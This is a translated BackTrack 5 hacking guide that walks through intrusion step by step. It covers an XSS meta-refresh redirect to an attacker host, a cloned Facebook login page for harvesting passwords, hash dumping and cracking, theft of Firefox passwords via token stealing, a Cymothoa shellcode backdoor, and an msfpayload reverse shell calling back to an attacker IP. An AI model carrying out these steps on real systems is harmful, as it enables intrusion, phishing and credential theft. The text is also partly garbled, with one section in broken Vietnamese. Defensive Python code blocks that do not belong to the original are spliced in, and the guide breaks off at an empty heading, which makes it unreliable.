BackTrack 5 User Guide (Vietnamese edition), 2012

Translated and compiled by: cutynhangheo@gmail.com

Table of contents
Foreword
Part I: Information gathering and an introduction to the VA tools
1. Information gathering
2. Vulnerability assessment
Part II: Exploitation tools and frameworks
1. The Metasploit Armitage toolkit
2. The Social-Engineer Toolkit
3. Privilege escalation tools
4. John the Ripper
Part III: More exploitation tools and frameworks
1. Stealing information from the browser
2. Information theft in practice
3. Hashcat in BackTrack 5
4. Privilege escalation in practice
5. Exploiting SQL injection in BackTrack 5
6. The surprising truth behind so-called automated exploitation tools
Part IV: How to stay hidden
1. Why stay hidden?
2. The Cymothoa OS backdoor
3. Is Meterpreter a backdoor?
4. Vulnerabilities exploited to plant backdoors
Part V: A simulated attack in detail
1. Autoscan Network in BackTrack 5
2. Online vulnerability resources
3. Pentesting the target
4. Covering tracks
5. Overview of the Windows security model

Foreword
cutynhangheo dedicates this guide to the members of HCEGroup and TheGioiMang.OrG on the occasion of the reopening of those two beloved forums. cutynhangheo also has a few words for those of you who have only just started playing at this art. In the art of hacking there is no such thing as laziness or slacking; take it as a rule that the moment you feel satisfied with what you have is the moment you start falling behind the rest of the world. In the art of hacking, knowledge, skill, reasoning, cunning and a little bit of luck always travel together. So the moment you feel you have everything you wanted is the moment you begin to lose it all. cutynhangheo also wants to say that this document is for reference only and for practical attack testing (pentesting) in a lab environment, or in an agency or organisation that wants its own systems tested. The knowledge in this guide was collected by cutynhangheo from many sources on the Internet; sincere thanks to the authors and sources cutynhangheo consulted.
Once again, cutynhangheo stresses that this document was translated and compiled for you purely for study and research; cutynhangheo accepts no responsibility if you use the knowledge, techniques and ideas in it to break the law of the Socialist Republic of Vietnam. cutynhangheo bears no legal responsibility for any impersonation or misuse of the knowledge above.

Part I: Information gathering and an introduction to the VA tools
BackTrack 5 carries the code name Revolution (which cutynhangheo loosely renders as "improvement"); this release was eagerly awaited by the security community (and the hacking community in particular) and was published in May 2011. Compared with BackTrack 4 R2 it is a big step forward. BackTrack 5 is said to have been rebuilt by its developers from scratch, giving us better improvements and fixes for the bugs of the earlier BackTrack 4 R2.
BackTrack 5 is named after an algorithm called backtracking. It supplies a collection of tools ranging from password cracking to pentesting and port scanning. BackTrack 5 has 12 tool categories, shown in figure 1 below.

Figure 1: The tool categories in BackTrack 5
A security tester (let us call them a Pentester; people like us are, for now, script kiddies, or in plain language "people who go hacking"; cutynhangheo reminds you that we are not real hackers yet, OK!) usually carries out a practical attack in 5 steps (depending on the environment and the specific case there may be more than 5), as follows:
1. Step 1 is gathering information about the system to be tested.
2. Step 2 is scanning for bugs and assessing the possible weaknesses of the system to be tested.
3. Step 3 is gaining access to the system to be tested through those possible weaknesses.
4. Step 4 is maintaining access to the system (it sounds complicated, but cutynhangheo thinks of it as the step where you plant a backdoor for the next visit).
5. Step 5 is removing all traces (in the movies they call it destroying the evidence; hehehe).
In this part of the BackTrack 5 pentesting guide we will look at information gathering and at the vulnerability assessment tools (if any) supplied in BackTrack 5.
1. Information gathering:
Information gathering is the first step, and an extremely important one, in a practical attack. In this step the pentester or attacker collects preliminary information about the target: the target network, the open ports, which hosts are live and which services run on each port. What do we end up with? Quite simply a table describing the structure of the target, plus information about the systems and networks the target is using. Figure 2 below is a screenshot of Zenmap; BackTrack supplies this tool so that a pentester or attacker can gather information about and analyse the target network.

Figure 2: The Zenmap UI in BackTrack 5

Zenmap's scan modes give us information about the target such as the service running on each port, the target's operating system version, the route to the target, workgroups and user accounts. This information is really useful for white box testing (and of course useful to an attacker as well).
Other information-gathering tools in BackTrack 5 are CMS identification and IDS/IPS identification, used to gather information about and analyse web applications. CMS identification gives preliminary information about the target CMS; this toolset can be used to assess vulnerabilities in the CMS, and most conveniently it supplies ready-made exploits that a pentester or attacker can test against the target. Tools such as joomscan (for the Joomla CMS) are covered later in this guide.
Another interesting and extremely powerful tool is Maltego, which is often used for SMTP analysis. Figure 3 below shows Maltego in action.

Figure 3: The Maltego UI in BackTrack 5

Maltego's Palette panel shows information such as DNS Name, Domain, Location, URL, email and other details about a website. Maltego applies different transforms to the entities to give the pentester or attacker the detailed information they need about the target. Maltego presents the information it gathers about the target visually, in a graphical interface.

2. Vulnerability assessment:
The second step in a pentest is assessing the vulnerabilities (if any), once the first step has been completed successfully.
With the target's layout obtained through footprinting (cutynhangheo recalls reading somewhere that it is defined as "leaving a footprint"), we now assess and analyse the weaknesses or vulnerabilities in the system under test. There are plenty of security websites on the internet that publish lists of exploitable vulnerabilities, but in this series we will concentrate only on what BackTrack 5 provides.
Web application scans are used to assess and find vulnerabilities in web applications. Figure 4 below introduces the joomscan tool in BackTrack 5. Joomscan uses the vulnerabilities listed in its resource files to look for vulnerabilities in websites running on Joomla.

Figure 4: The Joomscan tool

Joomscan is run with the following command:


./joomscan.pl -u <string> -x proxy:port


Here <string> is the Joomla website to be tested. Joomscan has options for checking the Joomla version, checking the server and checking whether a firewall is active. In figure 4 above, the target Joomla website is running on an Apache web server and the PHP version in use is 5.5.16.
OpenVAS (Open Vulnerability Assessment System) in BackTrack 5: opening Application > Backtrack > Vulnerability scanners > OpenVAS gives you the list of options shown in figure 5 below.


Figure 5: The OpenVAS options in BackTrack 5.

OpenVAS is a powerful tool for analysing and assessing the vulnerabilities of a target. Before using it, however, the vendor recommends that you set up certificates with the OpenVAS MkCert option. After that we need to create a new user account from the menu, as in this guide.
The user can customise the rules to apply, or accept an empty rule set by pressing Ctrl + D. Once a new user has been added with its login details, we can start using the toolset.

Figure 6: Adding an OpenVAS user account

OpenVAS performs vulnerability assessment on a Client/Server model. You should regularly update OpenVAS's library with the list of new vulnerabilities so that its checks are as effective as possible.
OpenVAS and Nessus Scanner:
Nessus Scanner is an automated vulnerability analysis and assessment toolset. Let us glance over the differences between the two.
Nessus Scanner comes in two editions, free and paid (that one hurts a lot of hacking folk like us, right! Spending money before we have even hacked anything), whereas OpenVAS is completely free (that is the good news; never think that free means junk, guys, some free things beat the paid ones hands down, and if you use free software the licensing people have nothing to come after you for). A recent comparison found that the plugin sources for the two toolsets differ considerably, and depending on each person's judgement one of the two will be the one they recommend against; naturally an automated scanner can produce wrong results, which cannot be avoided (you will ask cutynhangheo why introduce something that makes mistakes; cutynhangheo answers that by nature a program is written by humans, it only does what it is told and does not think like a human).
On the internet there are many groups set up to teach each other how to use other supporting tools, including of course the automated scanners, but cutynhangheo's advice is this: use automated scanners only for a comprehensive assessment of the vulnerabilities of the targets you are testing. BackTrack 5 also supplies other toolsets of the same kind, such as the CISCO tools, which are used to find vulnerabilities in networks running CISCO hardware. Fuzzers are supplied too, split into two groups: Network Fuzzers and VOIP Fuzzers.
That explains why BackTrack 5 ships with so many information-gathering and vulnerability-assessment tools. In this guide cutynhangheo will try to introduce one or two toolsets that cutynhangheo finds useful for you (for the rest, if you want to raise your skills, please go and use Google Search yourself; as the proverb goes, "I give you the fishing rod, not the fish").

Part II: Exploitation tools and frameworks
In the first part of this BackTrack 5 guide we went through the two steps of information gathering and vulnerability assessment with the tools introduced above. In this second part we are introduced to the tools for exploiting vulnerabilities remotely and learn how to use exploitation frameworks for privilege escalation, for example using John the Ripper to crack passwords and gain access to a remote Windows system.
1. The Metasploit Armitage toolkit:
Metasploit Armitage is the graphical front end of the famous vulnerability exploitation toolkit, Metasploit Framework. cutynhangheo will write a series on using Metasploit in the near future and make it available soon. In this BackTrack 5 guide we are shown how to use autopwn to exploit a browser vulnerability on a Windows XP system with Metasploit Armitage.

Figure 7: The Metasploit Armitage toolkit; the remotely compromised Windows system is highlighted in colour. The console at the bottom shows autopwn being used to exploit the browser vulnerability on that system. Armitage also gathered information about the target's operating system.

For this exploitation walkthrough you need a website with a cross-site scripting (XSS) bug whose vulnerability is URL redirection. When the victim clicks a particular URL in the browser, the victim's system spawns a meterpreter shell. The URL redirection code looks like this:


http://www.xyz?c="><meta HTTP-EQUIV="REFRESH" content="0; url=http://attacker">
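From the defender's side, the following added Python example (not code from the original guide) shows why the redirect above works and how to neutralise it: a template that drops the c parameter into an attribute unescaped, the same template with HTML escaping, a detection check for meta-refresh markers in request parameters, and a host allowlist for redirect targets. The attribute context and the allowlisted host www.xyz.com are assumptions.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed request parameter carrying the meta-refresh payload quoted in
# the text above (the attacker host is a placeholder, as on the page).
INJECTED = '"><meta HTTP-EQUIV="REFRESH" content="0; url=http://attacker">'

# Hypothetical allowlist of hosts a redirect may legitimately point to.
ALLOWED_REDIRECT_HOSTS = {"www.xyz.com"}


def render_unsafe(c: str) -> str:
    """Vulnerable template (assumed): the c= parameter is dropped into an
    attribute verbatim, so a value starting with "> closes the attribute and
    the tag and appends a <meta> refresh that sends the browser elsewhere."""
    return '<input type="text" value="' + c + '">'


def render_safe(c: str) -> str:
    """Hardened template: html.escape with quote=True turns ", <, > into
    entities, so the parameter can no longer break out of the attribute."""
    return '<input type="text" value="' + html.escape(c, quote=True) + '">'


# A <meta ... http-equiv=refresh ...> marker inside a request parameter.
META_REFRESH = re.compile(
    r"<\s*meta[^>]*http-equiv\s*=\s*['\"]?\s*refresh", re.IGNORECASE)


def looks_like_meta_refresh_injection(param: str) -> bool:
    """Detection: flag a request parameter that carries a meta-refresh tag.
    A WAF rule or access-log filter would apply this to query strings."""
    return META_REFRESH.search(param) is not None


def redirect_allowed(url: str) -> bool:
    """Mitigation on the redirect side: only follow http(s) redirects whose
    host is on the allowlist; external targets such as http://attacker fail."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and parts.netloc in ALLOWED_REDIRECT_HOSTS


def contains_meta_tag(markup: str) -> bool:
    """Helper for checking rendered output: is there a live <meta> tag in it?"""
    return re.search(r"<\s*meta", markup, re.IGNORECASE) is not None
```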


The auto-migration feature used in the exploit creates a new process on the victim's system, because if we exploited the vulnerability without migration the attack would be cancelled or would end when the user closes the browser. Migration therefore lets us keep a continuous connection to the victim's system even if the victim closes the browser.

Figure 8: An illustration of URL redirection from an XSS-vulnerable website, xyz.com, to the attacker at 192.168.13.132

2. The Social-Engineer Toolkit:
cutynhangheo will present the Social-Engineer Toolkit (SET) in detail in another guide in the near future. In this BackTrack 5 guide we will concentrate on the attack known as tab nabbing. In a simulated attack the victim opens a link in the browser; as soon as the victim switches to another tab, the original page is replaced with a forged one, and this attack lets the attacker obtain the victim's login details. The victim is tricked into entering his username and password into the forged page.
In this social engineering attack we choose a website as the attack vector and clone it. We need to decide which sites to clone, ones with the login forms we are interested in. cutynhangheo cloned a Facebook page for this BackTrack 5 guide purely for demonstration (cutynhangheo does not encourage you to do the same). Note that cloning does not work without an internet connection.
Figure 9 below shows the forged Facebook login page, and figure 10 below shows the data sent via POST being captured by SET.
This attack method can be extended to any URL you plan to clone: on pages that push data with the POST method the information is always collected, over HTTP or HTTPS. SET supports both protocols well and does a good job of sniffing login details.

Figure 9: A forged Facebook login page created with the Social-Engineer Toolkit, with options configured by the attacker.

Figure 10: POST data captured by the Social-Engineer Toolkit framework from a forged Facebook login page.

3. Privilege escalation tools:
We know that we do not always get administrator or superuser rights when we break into a remote system (if it were that easy there would be nothing interesting about it, OK!). Like an attacker, we need the highest privilege on the victim's system to run our payloads and do what we want (escalating to administrator or getting root, for instance). BackTrack 5 gives us a range of privilege escalation tools to meet these practical needs, as in figure 11 below.

Figure 11: The categories in BackTrack 5's privilege escalation toolset.

As figure 11 shows, BackTrack 5 provides 4 categories of privilege escalation tools, each working in a different way (to understand them all, cutynhangheo suggests you use them and get a feel for them).

4. John the Ripper:
Once a victim has been compromised (if you do not yet know how, cutynhangheo suggests you read cutynhangheo's SET and MSF guides for the details; it is not explained in this guide, too tiring), crackers usually use John the Ripper to crack the Windows password hashes and then use them to escalate privileges and gain administrative rights on the system.
After exploiting the vulnerability, the password hashes are dumped into a text file and fed to John the Ripper. John the Ripper is a very powerful toolset for cracking password hashes. Figures 12 and 13 below show the hash-cracking process as it relates to privilege escalation on a Windows system. The attack demonstrated can be carried out with either Metasploit Framework or the Social-Engineer Toolkit.

Figure 12: Dumping password hashes with the hashdump tool; the result is written to a text file and given to John the Ripper to crack.

As the figure below shows, the victim's accounts and passwords are listed the way John the Ripper reports them.
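The same hashdump output that feeds John the Ripper can be audited from the defender's side. The following added Python example (not part of the guide) parses pwdump-format lines and flags the conditions that make cracking easy: LM hashes still stored, blank passwords, and password reuse across accounts. The sample dump and its hash values are constructed; only the two empty-string hash constants are real.

```python
import re
from collections import defaultdict

# pwdump/hashdump record layout: user:rid:LM-hash:NT-hash:::
# These two constants are the well-known hashes of the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in the format hashdump writes out; the non-empty hash
# values are made-up hex, not real credentials.
SAMPLE_DUMP = """\
Administrator:500:0f20048efc645d0aaad3b435b51404ee:e45b4dc5ae30d6a7b8f5d1e03a2b9c41:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1003:aad3b435b51404eeaad3b435b51404ee:e45b4dc5ae30d6a7b8f5d1e03a2b9c41:::
alice:1005:aad3b435b51404eeaad3b435b51404ee:9c7f1a2b3d4e5f60718293a4b5c6d7e8:::
"""

LINE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)


def parse_dump(text):
    """Parse hashdump lines into (user, rid, lm, nt) tuples; junk lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            rows.append((user, int(rid), lm.lower(), nt.lower()))
    return rows


def audit(rows):
    """Findings a defender wants from a dump like this:
    - lm_stored: accounts whose LM field is not the empty-password LM hash,
      i.e. the password is also kept in the weak LM form John cracks fastest
    - blank_password: accounts whose NT hash is the empty-string hash
    - shared_password: groups of accounts with identical NT hashes
      (password reuse: cracking one of them yields all of them)."""
    by_nt = defaultdict(list)
    findings = {"lm_stored": [], "blank_password": [], "shared_password": []}
    for user, _rid, lm, nt in rows:
        if lm != EMPTY_LM:
            findings["lm_stored"].append(user)
        if nt == EMPTY_NT:
            findings["blank_password"].append(user)
        by_nt[nt].append(user)
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_password"].append(sorted(users))
    return findings
```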

Figure 13: The list, sorted as Username:Password

With those passwords in hand, escalating privileges on the victim's system is now really simple. In the protocol analysis sub-category we have Wireshark, which ranks at the top of the tools for analysing traffic flows on a network. cutynhangheo will try to finish the book on Wireshark as soon as possible for you.
This is proof of how much BackTrack 5 has developed. A smart and cunning attacker can make the most of these toolsets and combine them to diversify and maximise the attacker's gain. In this guide cutynhangheo wants to stress again that the most important thing in a simulated attack is the use of the privilege escalation tools. In the next part cutynhangheo will give you a few more privilege escalation techniques (to know more there is no substitute for diligence, reading, and asking Professor Google).

Part III: More exploitation tools and frameworks
When BackTrack 5 was released in May 2011, a great many pentest frameworks were eagerly awaited. That is what made cutynhangheo determined to write this third part of the BackTrack 5 guide, so that we can explore together the tools that exploit browser flaws, for instance to steal important information, escalate privileges on a website and recover passwords. In this part of the BackTrack 5 guide cutynhangheo will also give you an overview of automated exploitation of SQL injection with the DarkMySQLi toolset.

1. Stealing information from the browser:
In the previous part cutynhangheo gave an overview of exploiting the victim with payloads. In this part cutynhangheo will use Metasploit Framework modules to attack a Windows system and steal the browser data stored by Mozilla Firefox on Windows XP. A third-party tool called Firepassword retrieves all the passwords stored in Mozilla Firefox on the victim's system.
We will use the common WinXP RPC DCOM vulnerability to exploit and break into the victim's system, open a Metasploit shell and carry out the information-gathering steps. If the victim uses the Master Password feature in Mozilla Firefox, that is the most important piece of information to obtain first, because with the Master Password we can read all the other passwords in Mozilla Firefox with great ease. In practice the Master Password is very rarely used, which is exactly what makes it easy to retrieve the information stored in the browser.

2. Information theft in practice:
A pentester and a black-hat hacker pursue the same goal by the same methods: breaking into a network and stealing data. The difference is that the black hat sells the information to whoever wants it, or uses it for other purposes, whereas the pentester reports the stolen data to the agency or organisation that commissioned the pentest, with integrity, confidentiality and responsibility.
The information most often stolen includes personal data that can be used for social engineering attacks, credit card or other financial details, and possibly receipts, invoices or sensitive company information sitting in the mailbox. In short, a black hat wants to steal anything sensitive.
Checking what data could be stolen is therefore a very important step in a pentest; it is what makes the report to the organisation complete and honest. Figure 14 below shows the damage the victim would suffer.

Figure 14: A successful compromise of a Windows XP system.

At this point, as described above, we upload firepassword.exe to the victim's system to carry out the theft of the passwords stored in Firefox.
Use the upload command in the meterpreter shell to upload the file. A Firepassword file is uploaded (figure 15), and the data can be seen as in figure 16.

Figure 15: Firepassword.exe uploaded successfully to the victim's system.

Now we only need to run Firepassword.exe to see the passwords on the system. But (hehe, remember nothing in this game is ever called simple, least of all in the art of hacking; if it were simple and easy, someone else would have done it before our turn came) there is one thing to watch out for here. This will be good for your thinking (if you regard hacking as a passion), and it is that we need to check the victim's user level once we are inside the victim's system. The example below makes it easier to understand: we break into a Windows XP system with System rights, but for Firepassword.exe to run we need Administrator rights. So, to change the user level, we can use the following method.

2.1. Use the ps command in meterpreter to list all the processes running on the victim's system by PID, and find explorer.exe or any other process running with Administrator rights.
2.2. Now copy that PID and use the steal_token command to change the user's privilege level to Administrator.
2.3. To check which user you are currently running as, use the getuid command in the meterpreter shell.
Once you are Administrator, run Firepassword.exe from a Windows shell opened inside meterpreter and check the stored passwords, as in figure 16 below.

Figure 16: The stored accounts and passwords displayed by Firepassword.exe

For the walkthrough above, note one thing: the process only succeeds if you know the Master password of the Mozilla Firefox browser. Nine times out of ten, cutynhangheo has found, users pay no attention to the Master password feature and never set it, and so the information can be stolen. In this game, then, there is always an element of luck.
There are also a number of other third-party tools for stealing passwords from other browsers.

3. Hashcat in BackTrack 5:
Hashcat is a free, much improved, multi-platform password recovery tool that runs on many operating systems. Supported platforms include CUDA, OpenCL and CPU, and some others

Figure 17: The Hashcat commands in BackTrack 5
In this guide, as figure 17 shows, you can see the Hashcat syntax with a clear explanation of each option. The options fall into the following groups:

3.1. Starting the program.
3.2. Logging and the program's files.
3.3. Managing system resources.
3.4. Attack modes, including brute force, table lookups and permutations.

4. Privilege escalation in practice:
An attack usually follows this main pattern: when you break into the victim's system you usually get a very low, or let us say ordinary, user privilege. The next step is to check for local vulnerabilities so that we can escalate to the highest privilege on the victim's system. This is extremely important: to obtain the rights we want, we must assess the security level of the victim's system. The toolsets under Backtrack > Privilege escalation > Online attacks / Offline attacks were developed for exactly this.
Most processes on a Windows system can run with Administrator rights, but a few run with system rights. BackTrack 5 has tools such as meterpreter that make privilege escalation easy.

5. Exploiting SQL injection in BackTrack 5:
SQL injection is ranked number 1 in the OWASP Top 10 web application security vulnerabilities. It can be exploited by hand or with automated exploitation tools. Manual exploitation is extremely tedious and time-consuming (true for the UG crowd especially), whereas automated exploitation is faster, more user-friendly and more effective (spot on). Havij is one such automated SQL injection tool.
In this guide we only cover the DarkMySQLi toolset, which performs automated SQL injection against the victim website.
The command structure is as follows:


python DarkMySQLi.py -u http://target


Running the command above in the console makes the tool scan the whole victim website. The full path of the tool in BackTrack 5 is /pentest/web/DarkMySQLi.
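To show what an automated scanner like DarkMySQLi is probing for, and how the defender closes the hole and spots the probing, the following added Python example (not from the guide) builds a constructed sqlite database, contrasts a string-concatenated query with a parameterised one, and runs a simple marker detector over constructed web-server log lines. The function names, the users table and the log lines are all assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote


def make_db():
    """Constructed in-memory database standing in for the victim site's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "user"), ("bob", "user"), ("root", "admin")])
    return conn


def find_user_vulnerable(conn, username):
    """Vulnerable pattern: the request parameter is pasted into the SQL text,
    so quote characters inside it are parsed as SQL. This is the weakness a
    scanner such as DarkMySQLi is looking for."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    """Hardened pattern: the value is bound as a parameter and is never parsed
    as SQL, so the same input is just an unknown username."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Constructed tautology probe of the kind an automated scanner submits.
PROBE = "' OR '1'='1"

# Constructed Apache-style access log lines (the client is the attacker IP
# used throughout this guide); the second and third carry injection attempts.
SAMPLE_LOG = """\
192.168.13.132 - - [10/May/2012:10:01:02 +0700] "GET /news.php?id=5 HTTP/1.1" 200 512
192.168.13.132 - - [10/May/2012:10:01:05 +0700] "GET /news.php?id=5%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 9100
192.168.13.132 - - [10/May/2012:10:01:07 +0700] "GET /news.php?id=5%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 600
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')
# Tautology after a quote, UNION SELECT, or a trailing SQL comment.
SQLI_MARKER = re.compile(r"('\s*(or|and)\s+|union\s+select|--\s*$|/\*)", re.IGNORECASE)


def flag_requests(log_text):
    """Detection: return (client, decoded path) for requests whose URL-decoded
    query string carries one of the injection markers above."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, decoded = m.group(1), unquote(m.group(2))
        if SQLI_MARKER.search(decoded):
            hits.append((client, decoded))
    return hits
```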

6. The surprising truth behind so-called automated exploitation tools:
There are many vendors today selling automated pentest products with pitches like Cheaper, Faster and More accurate. With budgets and time limited, these vendors will naturally be the first choice. But we need to see automated pentest tools for what they are: they give people a distorted view of security, they narrow the gap so that you no longer need knowledge of IT and security policy. Everyone needs an objective assessment of the advantages and disadvantages of each of the two approaches cutynhangheo introduced above, based on the actual needs of the organisation.
In this part we were given an overview of web exploitation frameworks, of stealing browser data with third-party tools, and of uploading programs to the victim's system. In the next part cutynhangheo will introduce other aspects of information security, forensics and reverse engineering.

Part IV: How to stay hidden
In the previous parts we were introduced to the methods for gathering information about and assessing the vulnerabilities of a target system, analysing the network, scanning and gaining access to the target, and some privilege escalation tools. In this part we look at how to stay hidden.

1. Why stay hidden?
The purpose of a pentest is to replay the actions of attackers who use malicious code. No attacker wants to be discovered while breaking into a network, so attackers always rely on hiding techniques. When a pentester carries out an intrusion, the same hiding techniques must be used, so that the system is assessed as truthfully as possible.

Figure 18: The Maintaining Access toolset in BackTrack 5; we concentrate on the OS Backdoors part.

This part shows you how to use the Maintaining Access feature, which offers options such as OS Backdoors, Tunneling and Web Backdoors, as in figure 18.

2. The Cymothoa OS backdoor:
Cymothoa is the tool in BackTrack 5 for hiding a backdoor: the backdoor shellcode is injected into an existing process. The tool was developed by codewizard and crossbrowser of ElectronicSouls.
The tool's options are used as follows:


cymothoa -p <pid> -s <shellcode number> [options]


Cymothoa comes with a set of ready-made payloads, numbered from 0 to 14. The tool has a great many options, grouped into main options, injection options and payload options.

Figure 19: Running Cymothoa against pid 1484, listening on port 100

Figure 19 above shows what Cymothoa does: the result is port 100 bound to process 1484.

Figure 20: Before running Cymothoa.

Figure 21: After running Cymothoa.

Once we have injected the shellcode we can use netstat -l to show that port 100 is now listening; figure 21 is the result after injecting shellcode number 0 into process 1484. So we can see that we can run Cymothoa on any system, infect any service port of that system, and maintain access to it at any time. The victim will be unaware of the backdoor's existence unless the victim notices or suspects something unusual on their system.
To get the process id in BackTrack 5 we use the ps aux command in the Cymothoa shell.

3. Is Meterpreter a backdoor?
In the previous part meterpreter was introduced briefly as an indispensable part of the Metasploit Framework, used to gather information and open a session in the shell of the victim's system. In this part we are shown how to use meterpreter as a backdoor in BackTrack 5.
The command used:


/opt/framework/msf3/msfpayload [<options>] <payload> [actions]


This is how attackers return to the victim's system again and again without the victim having to click or run any malicious code. You need a real understanding of Metasploit and Meterpreter; see cutynhangheo's Metasploit guide (available as soon as possible) and the earlier parts of this BackTrack 5 guide.

Figure 22: Creating a backdoor exe with msfpayload.

In figure 22 you can see the file exploit.exe, the malicious msf meterpreter payload generated with the msfpayload command. Continuing this guide, we create a backdoor that always listens on port 4444 using the payload method; the victim's system will always connect back to the attacker's address 192.168.13.132 on port 4444.

Figure 23: The handler created in Metasploit to listen for the backdoor.

In Metasploit, create a handler and set the LHOST and LPORT options in the msfpayload console. Once that is done, just run exploit. This exploit can run against any target. Whenever the victim clicks on the file (you can deliver it to the victim by social engineering or any other disguise), it listens for LHOST and connects back to the attacker through LPORT. The moment the victim runs the file on their system, the meterpreter shell immediately establishes a connection. By now you can imagine what an attacker can do from here.
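For the defender, both the Cymothoa listener on port 100 (section 2 above) and the reverse connection to 192.168.13.132:4444 described here show up in the host's socket table. The following added Python example (not from the guide) parses Linux netstat -tanp style output, diffs the listening sockets against a baseline and flags established sessions to unexpected remote ports; the before/after listings, process names and allowed-port set are constructed assumptions.

```python
import re

# Constructed netstat -tanp style listings (Linux column layout), not captured
# from the page's lab. BEFORE stands in for figure 20 (clean baseline); AFTER
# adds the two things the text describes: a new listener on port 100 inside
# pid 1484 (Cymothoa) and an outbound session to 192.168.13.132:4444 (a reverse
# meterpreter calling home). Process names are made up.
BEFORE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1484/apache2
"""
AFTER = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1484/apache2
tcp        0      0 0.0.0.0:100             0.0.0.0:*               LISTEN      1484/apache2
tcp        0      0 192.168.13.140:49201    192.168.13.132:4444     ESTABLISHED 2310/updater
"""

# One TCP row: proto, recv-q, send-q, local addr:port, remote addr:port, state, pid/program
ROW = re.compile(
    r"^tcp6?\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+|\*)\s+(\S+)\s+(\d+)/(\S+)$")


def parse_netstat(text):
    """Turn the listing into dicts; the header and non-TCP lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            laddr, lport, raddr, rport, state, pid, prog = m.groups()
            rows.append({"laddr": laddr, "lport": int(lport), "raddr": raddr,
                         "rport": rport, "state": state, "pid": int(pid), "prog": prog})
    return rows


def new_listeners(before, after):
    """LISTEN sockets present after the change but absent from the baseline.
    Keyed on (port, pid) so that an already-running, legitimate-looking process
    that sprouts an extra listener (pid 1484 opening port 100) is still reported."""
    base = {(r["lport"], r["pid"]) for r in before if r["state"] == "LISTEN"}
    return [(r["lport"], r["pid"], r["prog"]) for r in after
            if r["state"] == "LISTEN" and (r["lport"], r["pid"]) not in base]


def suspicious_outbound(rows, allowed_remote_ports=(22, 53, 80, 443)):
    """ESTABLISHED sessions to a remote port outside the expected set; a reverse
    shell connecting to LHOST:LPORT appears here as 192.168.13.132:4444."""
    return [(r["raddr"], int(r["rport"]), r["pid"], r["prog"]) for r in rows
            if r["state"] == "ESTABLISHED" and r["rport"] != "*"
            and int(r["rport"]) not in allowed_remote_ports]
```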


Figure 24: The victim's system accessed from BT5 through the backdoor.

4. Li dng l hng c backdoor :
Backdoor l mt knh kt ni b mt vo h thng .Cc attacker c th truy cp khng b hn ch
vo h thng victim bng cch s dng cc backdoor, phng php ny s tit kim thi gian v cc
n lc ca k thut tn cng ban u .iu quan trng pentester l cn phi thc nghim xm
nhp h thng v tin hnh nh gi xem h thng c d dng b chim quyn iu khin bi
backdoor hay khng, ngn nga vic truy cp tri php ny pentester c th s dng cc bn v
li ph hp cho h thng .
The most common vulnerabilities today that enable backdoor attacks and takeovers are buffer overflows, cross-site scripting (XSS) and remote administration. The most common defensive measures include regularly updating security policy based on the scenarios that could occur, to minimize threats that could harm the organization; regularly auditing software for safety and following secure coding standards; and making sure that application-level security is tested and that issues are fixed on a regular basis.
In this part of the guide we have seen how to use stealth techniques in attacks and intrusions. In the next and final part of the BackTrack 5 guide series, cutynhangheo will walk through an attack based on a hypothetical scenario, carried out with BackTrack 5; this hypothetical attack will use all the methods and techniques introduced in the previous parts.








Part V: Details of a hypothetical attack
In the previous four parts of the BackTrack 5 guide, cutynhangheo explained each stage of the penetration testing process in detail. This final part condenses everything covered so far, and gives an objective look at the different aspects of ethical hacking and penetration testing.
For this part of the guide, we need to set up a lab as follows: one VM running Windows 7, one VM running BackTrack 5 and several VMs running other versions of Windows. We will go through each step of the attack process and try to penetrate this network.
1. The Autoscan Network tool in BackTrack 5:
After connecting to the network, the first step is to scan the network topology and check which hosts are live on the network. To do this, we use the Autoscan Network tool in BackTrack 5. The menu path to the tool is:

Application → Backtrack → Information gathering → Network analysis → Network scanners → Autoscan.

Figure 25: Autoscan Network 1.5.

As Figure 25 shows, Autoscan Network 1.5 is a tool that scans the network topology; it lists all IP addresses in use, with details on hostnames, users and the operating systems running on the network.
As in the earlier parts of the guide, you can also use Nmap for this. Before carrying out the attack, we perform vulnerability analysis on the target. Suppose our target has the IP address 192.168.13.129 and runs Windows 2000 Server; we could use Nessus or OpenVAS to check this operating system for vulnerabilities. In this part of the guide, however, cutynhangheo wants you to try checking for vulnerabilities manually.

2. Online vulnerability resources:

The best-known vulnerability information website, the National Vulnerability Database at http://web.nvd.nist.gov/view/vuln/search, provides information on the various vulnerabilities affecting a specific system.

Figure 26: National Vulnerability Database Search.

3. Pentesting the target:
